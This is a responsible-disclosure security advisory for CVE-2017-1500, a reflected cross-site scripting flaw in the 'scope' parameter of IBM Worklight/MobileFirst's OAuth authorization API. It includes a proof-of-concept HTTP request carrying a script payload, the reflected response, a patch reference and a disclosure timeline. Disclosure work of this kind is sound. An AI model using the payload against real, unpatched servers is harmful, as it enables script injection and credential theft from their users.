[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CVE-2017-1500 - Relected XSS in IBM WorkLight OAuth Server Web Api



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

☾ Reflected Cross-Site Scripting in IBM Worklight OAuth Server Web Api ☽

======== ☾ Table of Contents ☽ =========================================

  0. Overview
  1. Detailed Description
  2. Proof Of Concept
  3. Solution
  4. Disclosure Timeline
  5. Thanks & Acknowledgements
  6. References
  7. Credits
  8. Legal Notices

======== ☾ 0. Overview ☽ ===============================================

  Release Date:

    02 August 2017

  Revision:

    1.0

  Impact:

    Cross-Site Scripting (XSS) is a code injection attack that allows
    an attacker to execute malicious JavaScript code in a victim's
    browser, leading to steal sensitive information's and/or user
    credentials.

  Severity:

    Medium

  CVSS Score:

    5.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

  CVE-ID:

    CVE-2017-1500

  Vendor:

    IBM

  Affected Products:

    IBM Worklight Enterprise Edition
    IBM MobileFirst Platform Foundation

  Affected Versions:

    6.1, 6.2, 6.3, 7.0, 7.1, 8.0

  Product Description:

    Worklight/MobileFirst is IBM's premier mobile application platform.
    On the device client app side, WorkLight/MobileFirst provide a
    framework to wrap around HTML5 web pages and make them into native
    applications.

    This approach is popularized by PhoneGap, and is widely used by
    developers (such as the GMail team at Google) to create cross
    platform mobile applications.

    With this approach, most of the user interface is presented in HTML5
    web pages, and the native framework provides access to device native
    functionalities (e.g., camera and GPS) in the form of JavaScript
    functions that can be called within the HTML5 web pages. 

    On the server side, WorkLight/MobileFirst provides device management
    capabilities including a dashboard to view versions of the
    application installed on different devices.
    It can also manage sending PUSH notification to the devices.

    WorkLight/MobileFirst provides developer tools to create
    applications using their frameworks.

======== ☾ 1. Detailed Description ☽ ===================================

  During a Penetration Test to a mobile application it was found a
  Reflected Cross-Site Scripting (XSS) vulnerability.

  The mobile application was written by using an IBM security framework,
  called WorkLight (or better known MobileFirst).

  This vulnerability happens because the framework does not properly
  validate the untrusted input in a GET parameter, present in an
  authorization function exposed by RESTful Web Api.

  In detail the logout functionality return a HTTP 403 Forbidden
  if the value of the "scope" parameter is not defined in the
  "authenticationConfig.xml" and reflect it without a proper
  validation in the response body.

  To exploit the vulnerability simply append the payload to the
  original value present in the GET parameter "scope".

======== ☾ 2. Proof Of Concept ☽ =======================================

HTTP Request

[[
  GET /authorization/v1/authorization?client_id=[CLIENT_ID]
  &scope=-WSAuthRealm%22%3E%3Cscript%3Ealert(1)%3C/script%3E
  &isAjaxRequest=true&x=0.768018694
  Host: [UNDISCLOSED]
  User-Agent: [USER_AGENT]
  Accept: text/html
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: JSESSIONID=[SESSION_ID]
  Connection: close
]]

HTTP Response

[[
  HTTP/1.1 403 Forbidden
  Content-Type: text/html
  Connection: Close
  Date: Mon, 29 Aug 2016 16:13:37 GMT
  Strict-Transport- Security: max-age=157680000
  X-Expires- Orig: None
  Cache-Control: max-age=0, must-revalidate, private
  Content-Length: 109

  Logout failed: The realm 'WSAuthRealm"><script>alert(1)</script>'
  is not defined in authenticationConfig.xml.
]]

======== &#9790; 3. Solution &#9789; ===============================================

  Refer to IBM Security Bulletin C1000316 for patch, upgrade or
  suggested workaround information.

  See "References" for more details.

======== &#9790; 4. Disclosure Timeline &#9789; ====================================

  29/08/2016 : Discovery of the vulnerability
  07/09/2016 : Vulnerability submitted to vendor
  09/01/2017 : Request status update to the vendor, fix in progress
  27/04/2017 : Request status update to the vendor, fix in progress
  01/06/2017 : Request status update to the vendor, fix in progress
  11/07/2017 : Request status update to the vendor, fix in progress
  21/07/2017 : Vendor release the advisory and solution
  21/07/2017 : Request CVE-ID assignment 
  27/07/2017 : Vendor update the advisory with CVE-ID
  01/08/2017 : Public disclosure

======== &#9790; 5. Thanks & Acknowledgements &#9789; ==============================

  IBM PSIRT - Product Security Incident Response Team
  Emaze Networks S.p.A. - Assessment Team

======== &#9790; 6. References &#9789; =============================================

  (1) http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-1500
  (2) https://www-01.ibm.com/support/docview.wss?uid=swg2C1000316
  (3) https://exchange.xforce.ibmcloud.com/vulnerabilities/129404
  (4) http://cwe.mitre.org/data/definitions/79.html
  (5) https://www.ibm.com/blogs/psirt/
  (6) https://www.emaze.net/security-assessment/

======== &#9790; 7. Credits &#9789; ================================================

  This vulnerability was discovered and reported by:

    Gabriele 'matrix' Gristina (gabriele DOT gristina AT gmail DOT com)

  Contacts:

    https://www.linkedin.com/in/gabrielegristina
    https://twitter.com/gm4tr1x
    https://github.com/matrix/

======== &#9790; 8. Legal Notices &#9789; ==========================================

  Copyright (c) 2017 Gabriele 'matrix' Gristina

  Permission is granted for the redistribution of this alert
  electronically. It may not be edited in any way without mine express
  written consent. If you wish to reprint the whole or any
  part of this alert in any other medium other than electronically,
  please email me for permission.

  Disclaimer: The information in the advisory is believed to be accurate
  at the time of publishing based on currently available information.
  Use of the information constitutes acceptance for use in an AS IS
  condition.
  There are no warranties with regard to this information. Neither the
  author nor the publisher accepts any liability for any direct,
  indirect, or consequential loss or damage arising from use of,
  or reliance on,this information.

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJZgZIbAAoJEI8SLzp6plg3i2IQAL81C0hxf6j8RMQ2fp6GMItZ
GhnbRucij4O0sxbhUk1Yitmd2GFPotmZYCWmhPPPUYITuQP9RNX+hIVzwEL0jsQ0
QrnovRFpZOjdkqAnC7j8+frpitDP3RE4IdcuwBuEiKPGzSY8FPwxgFYLBdAmliT3
WbRWukIDqvMHmHIp9peqb/RNFLdnH6+YNWz+d7UDcdC5I1iLdiQkmSSmB/Us/hep
er1oOtKlLZcmEYZ9GtadjAqqQRs47zBy5HNzMWiTXbUVKPMVp1WObqJu1bjHe8bl
YPamcDBk67uDa2CYaE/26amVXYYuOTyH0dm6nYbLmVsz/eyWXjP9bLlqL3NPq3QJ
tDuUWcA/XumZF5yiGNeinhkzN55+2cW5de80eZ43BV7vugLaHo+m24gU02eYhQos
8hSX90R5he9a2QsTuzt8brTaclc4rfBOdPD1RYfGgadkqQIYH7c7Qbc6eypWz9S0
CgUWODJX6dKvhKy3iAuYcdQLYJECWGwQJGN4SyULoKTK021zgaXMSlQzC/gx+gP8
EKIXQH7mkBLS+rvGNJfZ4dmZzQjAETUuQrMphPNd1sCcEoo83/kTJPx9J1Rpwa6F
R8+t+KjWL1SdIlb6m4c+Bfhwu/zcEJW/U7LI+UPmDHey7MiGBlYObp0W8N+P0aa7
hKSN1qjfcTZCvp7X/xtV
=Eubs
-----END PGP SIGNATURE-----